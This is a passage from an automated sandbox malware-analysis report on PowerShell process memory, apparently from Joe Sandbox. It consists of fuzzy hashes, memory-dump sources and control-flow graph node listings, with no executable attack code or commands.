                                                                                                                                              • Opcode Fuzzy Hash: d414ca04ea14eb81ac057211c6a15278652c638cc0475cf712b576746e8a030b
                                                                                                                                              • Instruction Fuzzy Hash: C9E02035305110C7CF083B78B41C2AE7A56DBC4724F00002ED60A83343CF74184143D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 34a28e5502c644346df034a4d9b4288573e65fdd773465f2166973b2408d6012
                                                                                                                                              • Instruction ID: e221d68c55dde749dae522e79129d2328aac166852615b3d0efe47b3244e3ec0
                                                                                                                                              • Opcode Fuzzy Hash: 34a28e5502c644346df034a4d9b4288573e65fdd773465f2166973b2408d6012
                                                                                                                                              • Instruction Fuzzy Hash: FAD09E2671012617661472BE5A206FBA2CE8FC95A5F45017B9A89E7243ED84EC1143F5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e0af12d180676c041bc074b1b65ee9cf7b86fdae183158f921c08401b9e7786d
                                                                                                                                              • Instruction ID: d01b056d6b5da96678603cb5ae4c74d9aef54a95684d6333ee99514a8dfd1c00
                                                                                                                                              • Opcode Fuzzy Hash: e0af12d180676c041bc074b1b65ee9cf7b86fdae183158f921c08401b9e7786d
                                                                                                                                              • Instruction Fuzzy Hash: 35E08C31700614478612A66EA80089EB79ADAC86B6324842EE85D87301DE65EC0187D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction ID: 7b1ac64d8e40df4551968b7c651ba08e0d292e2e5236425f062fd388f33c54d9
                                                                                                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                              • Instruction Fuzzy Hash: F1E08631B00014978B08955AE4144D9F7BDDBCC220F14847AD94AA7341DA72A91586E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5631ebdf8ee03c8df48d8f13d34e6c88056f23eef93c4854e061f75989fe345a
                                                                                                                                              • Instruction ID: f144ff2edcece78b9df98d2326e2fa93083d99ef8739febc5455c8b5549ed264
                                                                                                                                              • Opcode Fuzzy Hash: 5631ebdf8ee03c8df48d8f13d34e6c88056f23eef93c4854e061f75989fe345a
                                                                                                                                              • Instruction Fuzzy Hash: 35E06D3190A348CFCB05EB78E44A0A97FB8EF46300F0401ADD98987352E6701982CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3a1a4a5c61c72f5d76c68e4cfc1f3fc2b367183ef0987feb5a26da52312d74aa
                                                                                                                                              • Instruction ID: 2561e6a2669a6858888204e814e8feb82c2a1612d752d3f45c3affda903aea3c
                                                                                                                                              • Opcode Fuzzy Hash: 3a1a4a5c61c72f5d76c68e4cfc1f3fc2b367183ef0987feb5a26da52312d74aa
                                                                                                                                              • Instruction Fuzzy Hash: 63D05E3004E7C88FC7031BB554304667FF89E07A0030A04C6D0C88B173C9689C84CB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b294898e69b4146686bb795d833dab694fa0031b619fe9444cde715b9fa7279
                                                                                                                                              • Instruction ID: 5ca2c21ebeb6d9eac1d26f4cba531918470d83ee903803ae6aa85f887740b42f
                                                                                                                                              • Opcode Fuzzy Hash: 2b294898e69b4146686bb795d833dab694fa0031b619fe9444cde715b9fa7279
                                                                                                                                              • Instruction Fuzzy Hash: CFD0A7313011149B464473ADB40C459B7DAD7C96A2300003EEA0DC3380DE21AC0583E4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction ID: 234154d0cd95c2b5de322cec4be98ad47ae97d36a9252d611eadfd0afdd0d10a
                                                                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                              • Instruction Fuzzy Hash: 34D062B4D042099F8780DFADC94156DFBF4EB48200F5485AA9919D7301F73156529BD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 14b1c1d125178788b3ea4b6cb4b14bb69d5f0e0b684e0e4ccf950cc7fa613355
                                                                                                                                              • Instruction ID: bfdf35c8fe2d66b200dd3a82bf55b37822c92756a8d1cea04960dfb04b0633bc
                                                                                                                                              • Opcode Fuzzy Hash: 14b1c1d125178788b3ea4b6cb4b14bb69d5f0e0b684e0e4ccf950cc7fa613355
                                                                                                                                              • Instruction Fuzzy Hash: AFC0120810D3E02EDF83433508A81A33FF02C8BA1531C11C2C1C2DB033C8684C08D722
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0a72b86a3985a50144ffddd48acf9eefea20aeab9a6f77d38276165e6627724b
                                                                                                                                              • Instruction ID: f284c09c96e81d7e8b91e6f8fb4300ff77263beae1e071609515f5c96d6eba62
                                                                                                                                              • Opcode Fuzzy Hash: 0a72b86a3985a50144ffddd48acf9eefea20aeab9a6f77d38276165e6627724b
                                                                                                                                              • Instruction Fuzzy Hash: 94D01734A09209CB8B14EFA8E44A46EBFB9EB44201F00416DDD4A93342EB306882CBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35f7f4c04b6a93e5ee79e65b34fd9c05244b9fe810600ba78f38ec259f306720
                                                                                                                                              • Instruction ID: 60bbf8896ed69f7cba37efeadedd3a75fd293d3d4a770a36a3cc24469515f4c7
                                                                                                                                              • Opcode Fuzzy Hash: 35f7f4c04b6a93e5ee79e65b34fd9c05244b9fe810600ba78f38ec259f306720
                                                                                                                                              • Instruction Fuzzy Hash: 3CD06731905109CBCF08AFA4F85E4FDBB78FB14311F40416ED95B52196EA212A9ACAC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 14d7f7c1791abc85229ea80dc827164eca5183713ebc37ac17db6b68fddf6567
                                                                                                                                              • Instruction ID: 752fbc8cbc50a849b34b60b45cb15b8fe29726b4857cfa54ac847a354f043598
                                                                                                                                              • Opcode Fuzzy Hash: 14d7f7c1791abc85229ea80dc827164eca5183713ebc37ac17db6b68fddf6567
                                                                                                                                              • Instruction Fuzzy Hash: 76B0923108470CCFC2086FB9A404828B7A9AB4860538108ECE40E0A2928F76E844CE54
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.1937151165.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_4ab0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: dn^$dn^$dn^$dn^
                                                                                                                                              • API String ID: 0-2231636864
                                                                                                                                              • Opcode ID: 83863496d95f50d494450f4e7016f9457946534bf90259b9adcd68e986a95c77
                                                                                                                                              • Instruction ID: e4fc84aaae34621f22fa4153a21b59b13694abd516b085194e5bd78cc88ec798
                                                                                                                                              • Opcode Fuzzy Hash: 83863496d95f50d494450f4e7016f9457946534bf90259b9adcd68e986a95c77
                                                                                                                                              • Instruction Fuzzy Hash: 81514A1141E3D15FE307AB3898B45DA3FB5AE5759870A81CBC0C4CF5A3D818589DC7AB

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:3
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 22233 83a6a50 22234 83a6a93 SetThreadToken 22233->22234 22235 83a6ac1 22234->22235

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 503 48ab569-48ab591 504 48ab593 503->504 505 48ab596-48ab8d1 call 48aaa7c 503->505 504->505 566 48ab8d6-48ab8dd 505->566
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c7ae1693dc2e80259f25b4c7c0e95c064ffd919bc3d840a867a5bf9a81921086
                                                                                                                                              • Instruction ID: 763e4e310d41819ae7a0478c239f6cd371d3bd3d085f4674b10c06d391bf814b
                                                                                                                                              • Opcode Fuzzy Hash: c7ae1693dc2e80259f25b4c7c0e95c064ffd919bc3d840a867a5bf9a81921086
                                                                                                                                              • Instruction Fuzzy Hash: AB914070B406145FEB15DBB888105AE7BE3EF84B00B008A19D616EB754DF74AE0A9BE5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 651 48ab578-48ab591 652 48ab593 651->652 653 48ab596-48ab8d1 call 48aaa7c 651->653 652->653 714 48ab8d6-48ab8dd 653->714
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16ecaf9ee6894fb3d378bc7e4f2302491b25f411c3f15f2392adb7087c76b8fa
                                                                                                                                              • Instruction ID: fc06dd021561c06abb9fd904ec31f74688132ef92304a08da311ea452a31fba1
                                                                                                                                              • Opcode Fuzzy Hash: 16ecaf9ee6894fb3d378bc7e4f2302491b25f411c3f15f2392adb7087c76b8fa
                                                                                                                                              • Instruction Fuzzy Hash: 4B914170B406145FEB15DBB888105AFBBE3EFC4B00B008A1DD616AB754DF74AE069BE5

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • SetThreadToken.KERNELBASE(?,?), ref: 083A6AB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2023176546.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_83a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadToken
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3254676861-0
                                                                                                                                              • Opcode ID: 796199cd36da110a890c0d46443a6eb30f51c71b88d3e146256a6f5bcf196791
                                                                                                                                              • Instruction ID: 84e088e9e56fc0a5250cb432b0fb1de511471ed837324ecf4421c32276ae6646
                                                                                                                                              • Opcode Fuzzy Hash: 796199cd36da110a890c0d46443a6eb30f51c71b88d3e146256a6f5bcf196791
                                                                                                                                              • Instruction Fuzzy Hash: A121B0B58053898FDB11DF99C845B9EFFF4EF8A320F1884AED044A7251D6759804CBA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 11 83a6a50-83a6abf SetThreadToken 13 83a6ac8-83a6ae5 11->13 14 83a6ac1-83a6ac7 11->14 14->13
                                                                                                                                              APIs
                                                                                                                                              • SetThreadToken.KERNELBASE(?,?), ref: 083A6AB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2023176546.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_83a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadToken
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3254676861-0
                                                                                                                                              • Opcode ID: 48d243b3ca7179006c92d2289e6b4e1d58a97997be99ba74192277ec0504196f
                                                                                                                                              • Instruction ID: 9f17cb2f7404cd04e59ee317837b30190fa7401ed1b3eafa7f077ac03b14eb0a
                                                                                                                                              • Opcode Fuzzy Hash: 48d243b3ca7179006c92d2289e6b4e1d58a97997be99ba74192277ec0504196f
                                                                                                                                              • Instruction Fuzzy Hash: 7A1133B59003098FDB10DF9AC884BDEFBF8EB88320F24842AD418A3350D774A944CFA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 17 7253ce8-7253d0d 18 7253f00-7253f09 17->18 19 7253d13-7253d18 17->19 27 7253ef7-7253efd 18->27 28 7253f0b-7253f4a 18->28 20 7253d30-7253d34 19->20 21 7253d1a-7253d20 19->21 25 7253eb0-7253eba 20->25 26 7253d3a-7253d3c 20->26 23 7253d24-7253d2e 21->23 24 7253d22 21->24 23->20 24->20 29 7253ebc-7253ec5 25->29 30 7253ec8-7253ece 25->30 31 7253d4c 26->31 32 7253d3e-7253d4a 26->32 33 7253f50-7253f55 28->33 34 72540ce-72540d5 28->34 35 7253ed4-7253ee0 30->35 36 7253ed0-7253ed2 30->36 38 7253d4e-7253d50 31->38 32->38 39 7253f57-7253f5d 33->39 40 7253f6d-7253f71 33->40 50 72540d7-7254112 34->50 51 72540c3-72540cb 34->51 41 7253ee2-7253ef6 35->41 36->41 38->25 42 7253d56-7253d75 38->42 43 7253f61-7253f6b 39->43 44 7253f5f 39->44 47 7253f77-7253f79 40->47 48 7254080-725408a 40->48 41->27 70 7253d85 42->70 71 7253d77-7253d83 42->71 43->40 44->40 52 7253f89 47->52 53 7253f7b-7253f87 47->53 54 7254097-725409d 48->54 55 725408c-7254094 48->55 67 7254228-7254231 50->67 68 7254118-725411d 50->68 57 7253f8b-7253f8d 52->57 53->57 58 72540a3-72540af 54->58 59 725409f-72540a1 54->59 57->48 63 7253f93-7253fb2 57->63 64 72540b1-72540c0 58->64 59->64 92 7253fb4-7253fc0 63->92 93 7253fc2 63->93 64->51 87 7254233-7254248 67->87 88 725421f-7254225 67->88 72 7254135-7254139 68->72 73 725411f-7254125 68->73 75 7253d87-7253d89 70->75 71->75 80 725413f-7254141 72->80 81 72541da-72541e4 72->81 77 7254127 73->77 78 7254129-7254133 73->78 75->25 79 7253d8f-7253d96 75->79 77->72 78->72 79->18 84 7253d9c-7253da1 79->84 85 7254151 80->85 86 7254143-725414f 80->86 89 72541e6-72541ee 81->89 90 72541f1-72541f7 81->90 94 7253da3-7253da9 84->94 95 7253db9-7253dc8 84->95 96 7254153-7254155 85->96 86->96 97 7254209 87->97 98 725424a-725425d 87->98 99 72541fd-72541ff 90->99 100 72541f9-72541fb 90->100 102 7253fc4-7253fc6 92->102 93->102 103 7253dad-7253db7 94->103 104 7253dab 94->104 95->25 114 7253dce-7253dec 95->114 96->81 107 725415b-725415d 96->107 101 725420b-725421a 97->101 105 725425f-7254281 98->105 106 725428b-7254295 98->106 99->97 100->101 101->88 102->48 111 7253fcc-7254003 102->111 103->95 104->95 133 72542d5-72542fe 105->133 134 7254283-7254288 105->134 109 7254297-725429c 106->109 110 725429f-72542a5 106->110 112 7254177-725417e 107->112 113 725415f-7254165 107->113 118 72542a7-72542a9 110->118 119 72542ab-72542b7 110->119 143 7254005-725400b 111->143 144 725401d-7254024 111->144 116 7254196-72541d7 112->116 117 7254180-7254186 112->117 122 7254167 113->122 123 7254169-7254175 113->123 114->25 140 7253df2-7253e17 114->140 124 7254188 117->124 125 725418a-7254194 117->125 126 72542b9-72542d2 118->126 119->126 122->112 123->112 124->116 125->116 151 7254300-7254326 133->151 152 725432d-725435c 133->152 140->25 161 7253e1d-7253e24 140->161 146 725400d 143->146 147 725400f-725401b 143->147 148 7254026-725402c 144->148 149 725403c-725407d 144->149 146->144 147->144 153 7254030-725403a 148->153 154 725402e 148->154 151->152 162 7254395-725439f 152->162 163 725435e-725437b 152->163 153->149 154->149 164 7253e26-7253e41 161->164 165 7253e6a-7253e9d 161->165 166 72543a1-72543a5 162->166 167 72543a8-72543ae 162->167 174 72543e5-72543ea 163->174 175 725437d-725438f 163->175 177 7253e43-7253e49 164->177 178 7253e5b-7253e5f 164->178 187 7253ea4-7253ead 165->187 170 72543b4-72543c0 167->170 171 72543b0-72543b2 167->171 176 72543c2-72543e2 170->176 171->176 174->175 175->162 179 7253e4d-7253e59 177->179 180 7253e4b 177->180 183 7253e66-7253e68 178->183 179->178 180->178 183->187
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d83eae84153df52f305dc8405d20c2e53e09c8d6b6ff366751225d6d5d77044a
                                                                                                                                              • Instruction ID: b0993c7b3dae8d6a3799d048edf685e045705856e018a25547b29d007f41a018
                                                                                                                                              • Opcode Fuzzy Hash: d83eae84153df52f305dc8405d20c2e53e09c8d6b6ff366751225d6d5d77044a
                                                                                                                                              • Instruction Fuzzy Hash: ED1269B1B243569FDB14EB68D4007ABBBE2AFC1254F24C47AD805CB282DB75DC91C7A1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 193 7252700-7252725 195 72528c4-72528cd 193->195 196 725272b-7252730 193->196 204 72528cf-725290d 195->204 205 72528bb-72528c1 195->205 197 7252732-7252738 196->197 198 7252748-725274c 196->198 199 725273c-7252746 197->199 200 725273a 197->200 202 7252871-725287b 198->202 203 7252752-7252756 198->203 199->198 200->198 206 725287d-7252886 202->206 207 7252889-725288f 202->207 208 7252769 203->208 209 7252758-7252767 203->209 211 7252913-7252918 204->211 212 7252a5c-7252a65 204->212 213 7252895-72528a1 207->213 214 7252891-7252893 207->214 215 725276b-725276d 208->215 209->215 216 7252930-7252934 211->216 217 725291a-7252920 211->217 231 7252a67-7252a7c 212->231 232 7252a53-7252a59 212->232 218 72528a3-72528ba 213->218 214->218 215->202 219 7252773-7252775 215->219 223 7252a0c-7252a16 216->223 224 725293a-725293c 216->224 220 7252924-725292e 217->220 221 7252922 217->221 218->205 226 7252785 219->226 227 7252777-7252783 219->227 220->216 221->216 234 7252a24-7252a2a 223->234 235 7252a18-7252a21 223->235 228 725294c 224->228 229 725293e-725294a 224->229 233 7252787-7252789 226->233 227->233 236 725294e-7252950 228->236 229->236 241 7252af4-7252af7 231->241 242 7252a7e-7252aa6 231->242 233->202 237 725278f-72527a9 233->237 238 7252a30-7252a3c 234->238 239 7252a2c-7252a2e 234->239 236->223 244 7252956-725296e 236->244 254 72527cc 237->254 255 72527ab-72527b4 237->255 245 7252a3e-7252a52 238->245 239->245 246 7252afd-7252b05 241->246 247 7252af9-7252afb 241->247 272 7252aa8 242->272 273 7252aaa-7252aac 242->273 262 7252970-7252976 244->262 263 7252988-725298c 244->263 245->232 251 7252b07-7252b0d 246->251 252 7252b1d-7252b21 246->252 247->246 259 7252b11-7252b19 251->259 260 7252b0f 251->260 256 7252c35-7252c3f 252->256 257 7252b27-7252b29 252->257 270 72527cf-72527d1 254->270 264 72527b6-72527b9 255->264 265 72527bb-72527c8 255->265 268 7252c41-7252c49 256->268 269 7252c4c-7252c52 256->269 266 7252b39 257->266 267 7252b2b-7252b37 257->267 284 7252b86-7252bb3 259->284 260->252 274 7252978 262->274 275 725297a-7252986 262->275 337 725298f call 48ae248 263->337 338 725298f call 48ae258 263->338 276 72527ca 264->276 265->276 277 7252b3b-7252b3d 266->277 267->277 278 7252c54-7252c56 269->278 279 7252c58-7252c64 269->279 281 72527d3-72527d9 270->281 282 72527eb-72527f1 270->282 283 7252ab6 272->283 273->283 274->263 275->263 276->270 277->256 285 7252b43-7252b62 277->285 287 7252c66-7252c80 278->287 279->287 289 72527dd-72527e9 281->289 290 72527db 281->290 339 72527f4 call 48a7350 282->339 340 72527f4 call 48a7360 282->340 316 7252bb5-7252bbb 284->316 317 7252bcd-7252bd9 284->317 310 7252b64-7252b70 285->310 311 7252b72 285->311 288 7252992-7252999 294 72529a0-72529fd 288->294 295 725299b-725299e 288->295 289->282 290->282 291 72527f7-72527fe 297 7252805-7252862 291->297 298 7252800-7252803 291->298 300 7252a02-7252a09 294->300 295->300 303 7252867-725286e 297->303 298->303 314 7252b74-7252b76 310->314 311->314 314->256 318 7252b7c-7252b83 314->318 319 7252bbd 316->319 320 7252bbf-7252bcb 316->320 326 7252bf1-7252c32 317->326 327 7252bdb-7252be1 317->327 318->284 319->317 320->317 328 7252be5-7252be7 327->328 329 7252be3 327->329 328->326 329->326 337->288 338->288 339->291 340->291
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.2017731974.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_7250000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4c45a8d77fec02bd52b8f43f0a247b84bf103596abbe02a1812ded01d19ac3a1
                                                                                                                                              • Instruction ID: dfda91a13265f7d47d25b76b2e7ef6ca723fa27ec3793a697b0fb5a9b960caa7
                                                                                                                                              • Opcode Fuzzy Hash: 4c45a8d77fec02bd52b8f43f0a247b84bf103596abbe02a1812ded01d19ac3a1
                                                                                                                                              • Instruction Fuzzy Hash: DBE118F1B30306DFDB24DBA9C4017AABBE1BF89211F14806AD905CB291DA75CD51C7A2

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 567 48aea38-48aea58 568 48aea5a-48aea5c 567->568 569 48aea61-48aea6e 567->569 570 48aedc1-48aedc8 568->570 572 48aea70-48aea81 569->572 574 48aea83-48aeaa5 call 48a014c 572->574 579 48aeaab 574->579 580 48aec08-48aec1f 574->580 581 48aeaad-48aeabe 579->581 588 48aecfb-48aed07 580->588 589 48aec25 580->589 584 48aeac0-48aeac2 581->584 586 48aeadc-48aeb65 584->586 587 48aeac4-48aeaca 584->587 616 48aeb6c-48aeba1 586->616 617 48aeb67 586->617 590 48aeace-48aeada 587->590 591 48aeacc 587->591 595 48aedb9 588->595 596 48aed0d-48aed24 588->596 592 48aec27-48aec38 589->592 590->586 591->586 600 48aec3a-48aec3c 592->600 595->570 596->595 611 48aed2a 596->611 602 48aec3e-48aec44 600->602 603 48aec56-48aec8e 600->603 604 48aec48-48aec54 602->604 605 48aec46 602->605 620 48aec90 603->620 621 48aec95-48aecca 603->621 604->603 605->603 612 48aed2c-48aed3d 611->612 619 48aed3f-48aed41 612->619 633 48aebab 616->633 634 48aeba3 616->634 617->616 622 48aed5b-48aed89 619->622 623 48aed43-48aed49 619->623 620->621 637 48aeccc 621->637 638 48aecd4 621->638 641 48aed8b-48aed96 622->641 642 48aedb5-48aedb7 622->642 625 48aed4b 623->625 626 48aed4d-48aed59 623->626 625->622 626->622 633->580 634->633 637->638 638->588 647 48aed99 call 48aea28 641->647 648 48aed99 call 48aea38 641->648 649 48aed99 call 48aebae 641->649 650 48aed99 call 48aecd7 641->650 642->570 644 48aed9f-48aedb3 644->641 644->642 647->644 648->644 649->644 650->644
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 53b9594a0aee40418eb6be8d84d4ef7144fc79b4da4508712876dfe97f2284d3
                                                                                                                                              • Instruction ID: 6de1a7a51399c67e8c6e9a8f1e6fd1f0c8aa50cdaa4dc452df329da42ed91b27
                                                                                                                                              • Opcode Fuzzy Hash: 53b9594a0aee40418eb6be8d84d4ef7144fc79b4da4508712876dfe97f2284d3
                                                                                                                                              • Instruction Fuzzy Hash: 6F918F34B502188FEB14DF78D5946ADBBF6AF88710B148969E802EB351DF74EC52CB90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
